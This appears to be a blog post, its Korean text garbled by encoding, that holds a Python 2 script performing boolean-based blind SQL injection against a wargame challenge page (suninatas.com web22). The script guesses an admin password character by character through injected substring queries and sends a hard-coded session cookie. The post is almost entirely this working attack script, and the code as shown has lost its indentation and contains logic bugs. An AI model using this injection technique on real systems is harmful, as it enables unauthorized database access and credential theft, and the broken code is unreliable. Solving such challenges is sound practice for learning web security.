728x90
๋ฐ์ํ
#http2,1)%3C%27N%27)--+&pw=admin
import urllib
import urllib2
ans =""
ans2=""
for i in range(1,11):
for j in range(33,127) :
url1 = "http://suninatas.com/Part_one/web22/web22.asp?id=admin'+and(substring(pw,"
url1=url1+str(i)+",1)='"
url1=url1+chr(j)+"')--+&pw=1"
try:
#print url1;
req = urllib2.Request(url1)
req.add_header('cookie',"ASPSESSIONIDSSATDDSQ=EMNOHBMDIHNLAAFFOHICOODE")
res = urllib2.urlopen(req)
data = res.read()
if data.find("OK") != -1:
print chr(j)
ans=ans2
break;
except:
j=j+1
continue
print ans
blind sql injection.py728x90
๋ฐ์ํ
'Language' ์นดํ ๊ณ ๋ฆฌ์ ๋ค๋ฅธ ๊ธ
| toolhelp (0) | 2015.09.24 |
|---|---|
| C์ธ์ด ์ ๋ฆฌ (0) | 2015.09.22 |
| arp spoofing.c (0) | 2015.09.08 |
| Mac Capture.c (0) | 2015.09.08 |
| base 64 encoding (0) | 2015.09.08 |
๋๊ธ